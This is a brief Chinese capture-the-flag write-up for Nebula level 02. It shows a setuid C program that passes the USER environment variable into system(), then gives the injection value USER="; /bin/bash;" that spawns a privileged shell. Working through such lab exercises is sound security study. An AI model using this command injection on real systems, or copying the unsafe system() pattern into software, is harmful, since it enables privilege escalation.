Nebula Challenge 02
题目简介:还是任意代码执行,不过这道题是用了类似注入的方式。
1 #include <stdlib.h> 2 #include <unistd.h> 3 #include <string.h> 4 #include <sys/types.h> 5 #include <stdio.h> 6 7 int main(int argc, char **argv, char **envp) 8 { 9 char *buffer; 10 11 gid_t gid; 12 uid_t uid; 13 14 gid = getegid(); 15 uid = geteuid(); 16 17 setresgid(gid, gid, gid); 18 setresuid(uid, uid, uid); 19 20 buffer = NULL; 21 22 asprintf(&buffer, "/bin/echo %s is cool", getenv("USER")); 23 printf("about to call system(\"%s\")\n", buffer); 24 25 system(buffer); 26 }
程序与外界的交互是$USER变量,可以对其进行注入,然后到system()中执行。
命令:USER="; /bin/bash;"
" " —— 防止/bin/bash被作为命令执行
; —— 结束之前的命令,开始新命令
/bin/bash —— 用于system("/bin/bash")的形成